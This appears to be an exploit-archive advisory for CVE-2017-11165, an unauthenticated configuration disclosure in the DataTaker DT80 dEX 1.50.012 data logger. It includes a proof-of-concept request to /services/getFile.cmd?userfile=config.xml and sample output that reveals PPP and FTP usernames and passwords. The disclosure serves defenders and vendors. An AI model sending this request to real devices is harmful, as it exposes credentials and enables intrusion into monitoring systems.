DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure: Posted Jul 12, 2017; Authored by Nassim Asrir; DataTaker DT80 dEX version 1.50.012 suffers from an information disclosure vulnerability.; tags | exploit, info disclosure; advisories | CVE-2017-11165; SHA-256 | 048568e8d903730e1c7a71509f06b027e564960e8dac311671ebcf6ca565d868; Download | Favorite | View

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-11165
 
Vendor:
===============
 
http://www.datataker.com/
  
  
About:
========

The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.

The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.  
  
Vulnerability Type:
===================
 
Sensitive Configurations Exposure.
 
 
issue:
===================
 
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
a direct request for the /services/getFile.cmd?userfile=config.xml URI.
  
POC:
===================

http://victim/services/getFile.cmd?userfile=config.xml


Output:
========

<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
<environment>
<application version="1.50.012" build="2014-01-07, 15:16:53"/>
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
<screen resolution="1024x768"/>
</environment>

etc....

<loggerSetting category="PPP" profile="USER">username</loggerSetting>

<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>

Top Authors In Last 30 Days

Red Hat 396 files
Ubuntu 97 files
Debian 30 files
Rahad Chowdhury 21 files
BugsBD Limited 21 files
Gentoo 18 files
tmrswrr 13 files
Google Security Research 5 files
Ph0s 5 files
R0ckE7 5 files

File Archives

Systems

AIX (429)
Apple (2,037)
BSD (375)
CentOS (57)
Cisco (1,926)
Debian (6,914)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,379)
HPUX (880)
iOS (363)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (47,862)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (486)
RedHat (14,631)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,142)
UNIX (9,340)
UnixWare (187)
Windows (6,607)
Other

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

Share This

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems